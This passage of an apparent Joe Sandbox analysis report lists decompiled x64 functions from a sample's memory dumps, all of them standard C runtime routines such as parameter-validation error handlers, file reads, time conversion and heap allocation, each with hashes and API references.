Associated: 00000001.00000002.330972663.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA910000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.331020191.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: a0c231647b24d9852de70eff871a2b210e81a6ebcaaf717043b768b8d22a8b00
Instruction ID: c36d954c3d9f19d22b379cee82d245db5af9bf9fd274714dfeb0e2c9de0ff986
Opcode Fuzzy Hash: a0c231647b24d9852de70eff871a2b210e81a6ebcaaf717043b768b8d22a8b00
Instruction Fuzzy Hash: E511C461618B4281EA11AB25E40406DF361BB94BF4FD48772EE7D477DACF3DD1648740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8E48CC Relevance: 3.0, APIs: 2, Instructions: 40timeCOMMON

Download Yara Rule

APIs

FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7DA8E47E1), ref: 00007FF7DA8E48FF
SystemTimeToTzSpecificLocalTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7DA8E47E1), ref: 00007FF7DA8E4915

Memory Dump Source

Source File: 00000001.00000002.330832121.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000001.00000002.330809729.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330933416.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA910000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.331020191.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: Time$System$FileLocalSpecific
String ID:
API String ID: 1707611234-0
Opcode ID: c2acd781a860b2283c906d38b22be488d7b82ddd1467d047cf226228e824bc51
Instruction ID: 839a22c6f0754ecc247b6a9f4fa9e84619222f1b0703e54b2ec35c1e5de43d11
Opcode Fuzzy Hash: c2acd781a860b2283c906d38b22be488d7b82ddd1467d047cf226228e824bc51
Instruction Fuzzy Hash: 4711602160C653C1FA54AB14A44113EF760FB95771FE00276EAAD819E9EF2ED564CB20

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8EB2CC Relevance: 1.6, APIs: 1, Instructions: 112
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00007FF77FF7DA8EB2CC(signed int __edi, intOrPtr* __rax, long long __rbx, void* __rcx, long long __rdi, long long __rsi, long long _a8, long long _a16, long long _a24) {

				_a8 = __rbx;
				_a16 = __rsi;
				_a24 = __rdi;
				if (__rcx != 0) goto 0xda8eb314;
				E00007FF77FF7DA8E4394(__rax);
				 *__rax = 0x16;
				E00007FF77FF7DA8E9D00();
				return __edi | 0xffffffff;
			}

0x7ff7da8eb2cc
0x7ff7da8eb2d1
0x7ff7da8eb2d6
0x7ff7da8eb2e7
0x7ff7da8eb2e9
0x7ff7da8eb2ee
0x7ff7da8eb2f4
0x7ff7da8eb313

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7DA8EB2F4

Memory Dump Source

Source File: 00000001.00000002.330832121.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000001.00000002.330809729.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330933416.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA910000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.331020191.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: b8ff714229eac61573b8c54aef94970a551645be3ec3e531d410b1a1cea9ddf2
Instruction ID: 8e699729ed87ae0fc017f8a368cf2500401727d1eb1cabeba17cdb2a96c0e7f1
Opcode Fuzzy Hash: b8ff714229eac61573b8c54aef94970a551645be3ec3e531d410b1a1cea9ddf2
Instruction Fuzzy Hash: 3741DF32908241C3FA26AB19A54527DF3A1FB65B54FD04172DF8E836D2CF2EE612C761

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8D7170 Relevance: 1.6, APIs: 1, Instructions: 85
COMMON

Download Yara Rule

C-Code - Quality: 52%

			E00007FF77FF7DA8D7170(void* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rdi, void* __r8) {
				void* _t12;
				void* _t14;
				void* _t27;
				void* _t28;
				void* _t31;
				long long _t33;
				void* _t35;
				long long _t52;
				void* _t57;
				long long _t58;
				void* _t60;
				void* _t62;
				void* _t67;
				void* _t68;
				void* _t71;
				void* _t72;

				_t52 = __rdi;
				_t33 = __rbx;
				_t31 = __rax;
				_t67 = __rcx;
				_t57 = __r8;
				_t71 = __rdx;
				r13d = 0; // executed
				0xda8e4000(); // executed
				_t72 = __rax;
				if (__rax == 0) goto 0xda8d7283;
				_t1 = _t68 + 2; // 0x2
				r8d = _t1;
				_t12 = E00007FF77FF7DA8DF884(__rax, __rbx, __rcx, __rdi); // executed
				if (_t12 < 0) goto 0xda8d7283;
				 *((long long*)(_t62 + 0x50)) = _t33;
				E00007FF77FF7DA8E7888(__rax, _t33, _t67, _t52); // executed
				_t34 = _t31;
				if (_t31 - __r8 < 0) goto 0xda8d727e;
				 *((long long*)(_t62 + 0x58)) = _t58;
				 *((long long*)(_t62 + 0x60)) = _t52;
				_t5 = _t34 - 0x2000; // -8192
				_t60 =  <  ? _t68 : _t5;
				_t35 = _t31 - _t60;
				if (_t35 - __r8 < 0) goto 0xda8d7274;
				r8d = 0;
				_t14 = E00007FF77FF7DA8DF884(_t31, _t35, _t67, _t52); // executed
				if (_t14 < 0) goto 0xda8d7274;
				E00007FF77FF7DA8DF54C(_t60, _t35, _t67); // executed
				_t27 = _t31 - _t35;
				if (_t27 != 0) goto 0xda8d7274;
				if (_t27 == 0) goto 0xda8d725b;
				_t6 = _t72 - 1; // -1
				_t28 = E00007FF77FF7DA8DC740(0x2000, _t6 + _t35 - _t57 + 1, _t71, _t57);
				if (_t28 == 0) goto 0xda8d726d;
				if (_t28 != 0) goto 0xda8d7240;
				if (_t60 != 0) goto 0xda8d71e0;
				goto 0xda8d7274;
				return E00007FF77FF7DA8E3FEC(0x2000, _t72, _t71, _t57);
			}

APIs

_fread_nolock.LIBCMT ref: 00007FF7DA8D721A

Memory Dump Source

Source File: 00000001.00000002.330832121.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000001.00000002.330809729.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330933416.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA910000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.331020191.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: _fread_nolock
String ID:
API String ID: 840049012-0
Opcode ID: 1909cb8615bf05da54bd39bf6f7fce3d1e910c433ceb0e2e0459236c2f447c67
Instruction ID: 4ccf802272e51feb13761ad83ddc974da8e47b45f59649c1d9c3c8a457ca2f70
Opcode Fuzzy Hash: 1909cb8615bf05da54bd39bf6f7fce3d1e910c433ceb0e2e0459236c2f447c67
Instruction Fuzzy Hash: 15218121F0829189FE16AA12A5043BEE652BB45BD4FCC44B2EE4D06B87DF3DE562C310

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8EAD5C Relevance: 1.6, APIs: 1, Instructions: 79
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00007FF77FF7DA8EAD5C(signed int __ecx, void* __esi, signed int __rbx, void* __rdx, signed int __rsi, signed int __r12, void* _a16, void* _a24, void* _a32) {
				signed int _t9;
				signed int* _t15;
				signed int* _t22;

				_t15 = _t22;
				_t15[4] = __rbx;
				_t15[6] = __rsi;
				_t15[8] = __r12;
				_t15[2] = __ecx;
				r14d = r8d;
				if (__esi != 0xfffffffe) goto 0xda8eadb6;
				E00007FF77FF7DA8E4374(_t15);
				 *_t15 =  *_t15 & 0x00000000;
				_t9 = E00007FF77FF7DA8E4394(_t15);
				 *_t15 = 9;
				return _t9 | 0xffffffff;
			}

0x7ff7da8ead5c
0x7ff7da8ead5f
0x7ff7da8ead63
0x7ff7da8ead67
0x7ff7da8ead6b
0x7ff7da8ead78
0x7ff7da8ead84
0x7ff7da8ead86
0x7ff7da8ead8b
0x7ff7da8ead8e
0x7ff7da8ead93
0x7ff7da8eadb5

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7DA8EADE2

Memory Dump Source

Source File: 00000001.00000002.330832121.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000001.00000002.330809729.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330933416.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA910000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.331020191.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: e997cbf7fc92c3c183a72cd21195dcc51c15026f486b38af738c32ae7cc95935
Instruction ID: 8b9315fee26c8069a7819dab5a7549f5010ce3a20de1cfad2da0602544191b34
Opcode Fuzzy Hash: e997cbf7fc92c3c183a72cd21195dcc51c15026f486b38af738c32ae7cc95935
Instruction Fuzzy Hash: 70318B61A18652C5F612BB1588013BCEA50BB64FA6FD10AB6DE1D433D3CF7EA6618230

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8E8709 Relevance: 1.6, APIs: 1, Instructions: 61
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E00007FF77FF7DA8E8709(void* __ecx, char __edx, intOrPtr* __rax, long long __rbx, long long _a8, char _a16, char _a24, char _a32) {
				long long _v16;
				long long _v24;
				char _v32;
				long long _v40;
				char _v48;
				char _v52;
				void* _v56;
				void* _t28;
				intOrPtr* _t50;
				WCHAR* _t53;

				E00007FF77FF7DA8E9028();
				asm("int3");
				_a24 = r8d;
				_a16 = __edx;
				_v40 = 0xfffffffe;
				_a8 = __rbx;
				if (r8d != 0) goto 0xda8e877f;
				GetModuleHandleW(_t53);
				if (__rax == 0) goto 0xda8e877f;
				if ( *__rax != 0x5a4d) goto 0xda8e877f;
				_t50 =  *((intOrPtr*)(__rax + 0x3c)) + __rax;
				if ( *_t50 != 0x4550) goto 0xda8e877f;
				if ( *((intOrPtr*)(_t50 + 0x18)) != 0x20b) goto 0xda8e877f;
				if ( *((intOrPtr*)(_t50 + 0x84)) - 0xe <= 0) goto 0xda8e877f;
				if ( *((intOrPtr*)(_t50 + 0xf8)) == 0) goto 0xda8e877f;
				E00007FF77FF7DA8E8830(0x20b, __ecx, __rax);
				_a32 = 0;
				_v32 =  &_a16;
				_v24 =  &_a24;
				_v16 =  &_a32;
				_v52 = 2;
				_v48 = 2;
				_t28 = E00007FF77FF7DA8E860C(__rbx,  &_v48,  &_v32,  &_v52);
				if (_a24 == 0) goto 0xda8e87cd;
				return _t28;
			}

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF7DA8E8737

Part of subcall function 00007FF7DA8E8830: GetModuleHandleExW.KERNEL32 ref: 00007FF7DA8E8855
Part of subcall function 00007FF7DA8E8830: GetProcAddress.KERNEL32 ref: 00007FF7DA8E886B
Part of subcall function 00007FF7DA8E8830: FreeLibrary.KERNEL32 ref: 00007FF7DA8E8892

Memory Dump Source

Source File: 00000001.00000002.330832121.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000001.00000002.330809729.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330933416.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA910000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.331020191.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: HandleModule$AddressFreeLibraryProc
String ID:
API String ID: 3947729631-0
Opcode ID: 2312a5d6f4b211effc73cb1fcb8204366b0276267849894ad1c3aa5345b265bd
Instruction ID: 947323d2217bf0b560f748190e0ee3e54c4abe0b55c9dab412a0fcdcf0036200
Opcode Fuzzy Hash: 2312a5d6f4b211effc73cb1fcb8204366b0276267849894ad1c3aa5345b265bd
Instruction Fuzzy Hash: 0A217C32F05642C9FB26AF64C8402AC73A0FB64718F940636DE2C06AD6DF3ED664CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8E5418 Relevance: 1.6, APIs: 1, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E00007FF77FF7DA8E5418(intOrPtr __ebp, long long __rbx, short* __rcx, long long __rdx, long long __rbp, void* __r8, long long __r9, char _a8, void* _a16, void* _a24, void* _a32) {
				long long _v48;
				long long _v56;
				void* __rsi;
				intOrPtr _t56;
				signed long long _t80;
				intOrPtr _t82;
				intOrPtr _t86;
				long long _t89;
				signed long long _t97;
				void* _t98;
				signed long long _t99;
				short* _t105;
				long long _t106;
				void* _t109;
				signed long long _t111;
				intOrPtr* _t117;
				long long _t125;

				r8d = 0x40;
				goto 0xda8e534c;
				asm("int3");
				_t80 = _t111;
				 *((long long*)(_t80 + 0x10)) = __rdx;
				_push(_t98);
				 *((long long*)(_t80 - 0x28)) = 0xfffffffe;
				 *((long long*)(_t80 + 0x18)) = __rbx;
				 *((long long*)(_t80 + 0x20)) = __rbp;
				_t89 = __r9;
				_t109 = __r8;
				_t105 = __rcx;
				r14d = 0;
				_t56 = r14d;
				if (__rcx == 0) goto 0xda8e5467;
				if (__r8 != 0) goto 0xda8e5463;
				goto 0xda8e560c;
				 *((intOrPtr*)(__rcx)) = r14w;
				if (__rdx != 0) goto 0xda8e5499;
				 *((char*)(__r9 + 0x30)) = 1;
				 *((intOrPtr*)(__r9 + 0x2c)) = 0x16;
				_v48 = __r9;
				_v56 = _t125;
				r9d = 0;
				r8d = 0;
				E00007FF77FF7DA8E9C34(_t80, __r9, __rcx, __rdx, __rcx, __r8, __r8);
				goto 0xda8e560c;
				if ( *((intOrPtr*)(__r9 + 0x28)) != r14b) goto 0xda8e54ac;
				E00007FF77FF7DA8E3970(_t80 | 0xffffffff, __r9, __r9, _t105, _t125);
				_t82 =  *((intOrPtr*)(__r9 + 0x18));
				if ( *((intOrPtr*)(_t82 + 0xc)) != 0xfde9) goto 0xda8e54df;
				_a8 = _t125;
				_v56 = __r9;
				_t97 =  &_a16;
				E00007FF77FF7DA8EF4CC(_t82, __r9, _t105, _t97, _t109,  &_a8);
				goto 0xda8e560c;
				if (_t105 == 0) goto 0xda8e55c1;
				if ( *((intOrPtr*)(_t82 + 0x138)) != 0) goto 0xda8e551a;
				if (_t109 == 0) goto 0xda8e5512;
				 *_t105 =  *(_t98 + _t97) & 0x000000ff;
				if ( *(_t98 + _t97) == r14b) goto 0xda8e5512;
				_t99 = _t98 + 1;
				_t106 = _t105 + 2;
				if (_t99 - _t109 < 0) goto 0xda8e54f9;
				goto 0xda8e560c;
				_v48 = __ebp;
				_v56 = _t106;
				r9d = _t56;
				E00007FF77FF7DA8EE740();
				if (_t99 != 0) goto 0xda8e5609;
				if (GetLastError() == 0x7a) goto 0xda8e555c;
				 *((char*)(_t89 + 0x30)) = 1;
				 *((intOrPtr*)(_t89 + 0x2c)) = 0x2a;
				 *_t106 = r14w;
				goto 0xda8e5512;
				r9d = __ebp;
				_t117 = _a16;
				if (__ebp == 0) goto 0xda8e5595;
				r9d = r9d - 1;
				if ( *_t117 == r14b) goto 0xda8e5595;
				if ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t89 + 0x18)))) + _t97 * 2)) - r14w >= 0) goto 0xda8e558d;
				if ( *((intOrPtr*)(_t117 + 1)) == r14b) goto 0xda8e554b;
				goto 0xda8e5569;
				r8d = r8d - r10d;
				_t86 =  *((intOrPtr*)(_t89 + 0x18));
				_v48 = __ebp;
				_v56 = _t106;
				r9d = r8d;
				E00007FF77FF7DA8EE740();
				if (_t86 != 0) goto 0xda8e560c;
				goto 0xda8e554b;
				if (_t86 != 0) goto 0xda8e55d8;
				if ( *((intOrPtr*)(_t97 + (_t99 | 0xffffffffffffffff) + 1)) != r14b) goto 0xda8e55ca;
				goto 0xda8e5512;
				_v48 = r14d;
				_v56 = _t125;
				r9d = _t56;
				E00007FF77FF7DA8EE740();
				if (_t86 != 0) goto 0xda8e5609;
				 *((char*)(_t89 + 0x30)) = 1;
				 *((intOrPtr*)(_t89 + 0x2c)) = 0x2a;
				goto 0xda8e5512;
				return _t86;
			}

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7DA8E537D

Memory Dump Source

Source File: 00000001.00000002.330832121.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000001.00000002.330809729.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330933416.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA910000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.331020191.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: be1079961907d1906d587a3e65c1e024338dd0a3e917ec7f85ba85c18500dcb2
Instruction ID: 2092866fc2fb777ddb374b4d7a065dd84a174c5c40cf09acda402532f73df2d6
Opcode Fuzzy Hash: be1079961907d1906d587a3e65c1e024338dd0a3e917ec7f85ba85c18500dcb2
Instruction Fuzzy Hash: 62115421A1C681C1FA66BF51940027DE260BFA6B84FD44472EF4C57A87DFBFD6208760

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8F56AC Relevance: 1.6, APIs: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00007FF77FF7DA8F56AC(intOrPtr* __rax, long long __rbx, long long _a8, intOrPtr _a40) {

				_a8 = __rbx;
				if (_a40 != 0) goto 0xda8f56e1;
				E00007FF77FF7DA8E4394(__rax);
				 *__rax = 0x16;
				E00007FF77FF7DA8E9D00();
				return 0x16;
			}

0x7ff7da8f56ac
0x7ff7da8f56c1
0x7ff7da8f56c3
0x7ff7da8f56cd
0x7ff7da8f56cf
0x7ff7da8f56e0

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7DA8F56CF

Memory Dump Source

Source File: 00000001.00000002.330832121.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000001.00000002.330809729.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330933416.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA910000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.331020191.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 8ab5c6977405cb0da174d71da5799961f335fed1fd48e027706f666140a89b5c
Instruction ID: 07017cc4dafa9ea8bb6855d47cc89df70cf5ff4c8227bdb47b94158e15dbc1f2
Opcode Fuzzy Hash: 8ab5c6977405cb0da174d71da5799961f335fed1fd48e027706f666140a89b5c
Instruction Fuzzy Hash: B821D332A0CA4387EB26AF18D44076DB7A0FB94B54FD44236DA6D876DADF3DD4118B10

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8DF56C Relevance: 1.5, APIs: 1, Instructions: 48
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00007FF77FF7DA8DF56C(long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, void* __r8, void* __r9, long long __r14, void* _a8, void* _a16, void* _a24, void* _a32, intOrPtr _a40) {
				intOrPtr* _t19;
				intOrPtr* _t31;

				_t19 = _t31;
				 *((long long*)(_t19 + 8)) = __rbx;
				 *((long long*)(_t19 + 0x10)) = __rsi;
				 *((long long*)(_t19 + 0x18)) = __rdi;
				 *((long long*)(_t19 + 0x20)) = __r14;
				if (__r8 == 0) goto 0xda8df5c5;
				if (__r9 == 0) goto 0xda8df5c5;
				if (_a40 != 0) goto 0xda8df5e2;
				if (__rdx == 0xffffffff) goto 0xda8df5b5;
				E00007FF77FF7DA8DC170();
				E00007FF77FF7DA8E4394(_t19);
				 *_t19 = 0x16;
				E00007FF77FF7DA8E9D00();
				return 0;
			}

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7DA8DF5C0

Memory Dump Source

Source File: 00000001.00000002.330832121.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000001.00000002.330809729.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330933416.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA910000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.331020191.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 1748ab499dec2cd63d41733e33088bccb1bfcf71d5c0ce3e5d0110a60e1804e7
Instruction ID: 24ae969e189b508d69917cac0ccadc7450e87b47fd9fc86ded991eb5adde6486
Opcode Fuzzy Hash: 1748ab499dec2cd63d41733e33088bccb1bfcf71d5c0ce3e5d0110a60e1804e7
Instruction Fuzzy Hash: 6D01C221A0874280FA06BF62990006DE7A1BB51FE0FCC46B2DE5D03BCBDE3DD5218710

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8E6A94 Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00007FF77FF7DA8E6A94(void* __ecx, intOrPtr* __rax, long long __rbx, long long __rdi, long long __rsi, long long _a8, long long _a16, long long _a24) {

				_a8 = __rbx;
				_a16 = __rsi;
				_a24 = __rdi;
				if (__ecx - 0x2000 < 0) goto 0xda8e6adc;
				E00007FF77FF7DA8E4394(__rax);
				 *__rax = 9;
				E00007FF77FF7DA8E9D00();
				return 9;
			}

0x7ff7da8e6a94
0x7ff7da8e6a99
0x7ff7da8e6a9e
0x7ff7da8e6ab1
0x7ff7da8e6ab3
0x7ff7da8e6abd
0x7ff7da8e6abf
0x7ff7da8e6adb

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7DA8E6ABF

Memory Dump Source

Source File: 00000001.00000002.330832121.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000001.00000002.330809729.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330933416.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA910000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.331020191.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 12e0e53eb4cc63a95771bdcd00f2c9527e1bc8f393490eaab8484543856046e8
Instruction ID: c9fb58995f72a8cc0afb13b08d901c09a5809cbaba3d4bece707ed9d478f25b1
Opcode Fuzzy Hash: 12e0e53eb4cc63a95771bdcd00f2c9527e1bc8f393490eaab8484543856046e8
Instruction Fuzzy Hash: 97119032918642C6F302BB10E84052DE7A5FB94340FC504B6DA5E876A3DF3EEA318720

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8EDC90 Relevance: 1.5, APIs: 1, Instructions: 36
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 37%

			E00007FF77FF7DA8EDC90(void* __eax, signed int __rcx, signed int __rdx) {
				void* __rbx;
				intOrPtr* _t22;
				signed int _t29;

				_t29 = __rdx;
				if (__rcx == 0) goto 0xda8edcaf;
				_t1 = _t29 - 0x20; // -32
				_t22 = _t1;
				if (_t22 - __rdx < 0) goto 0xda8edcf2;
				_t25 =  ==  ? _t22 : __rcx * __rdx;
				goto 0xda8edcd6;
				if (E00007FF77FF7DA8E8A3C() == 0) goto 0xda8edcf2;
				if (E00007FF77FF7DA8F2600(_t22,  ==  ? _t22 : __rcx * __rdx,  ==  ? _t22 : __rcx * __rdx) == 0) goto 0xda8edcf2;
				RtlAllocateHeap(??, ??, ??); // executed
				if (_t22 == 0) goto 0xda8edcc1;
				goto 0xda8edcff;
				E00007FF77FF7DA8E4394(_t22);
				 *_t22 = 0xc;
				return 0;
			}

APIs

RtlAllocateHeap.NTDLL(?,?,00000000,00007FF7DA8EA806,?,?,?,00007FF7DA8E99C3,?,?,00000000,00007FF7DA8E9C5E), ref: 00007FF7DA8EDCE5

Memory Dump Source

Source File: 00000001.00000002.330832121.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000001.00000002.330809729.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330933416.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA910000.00000004.00000001.01000000.00000003.sdmpDownload File
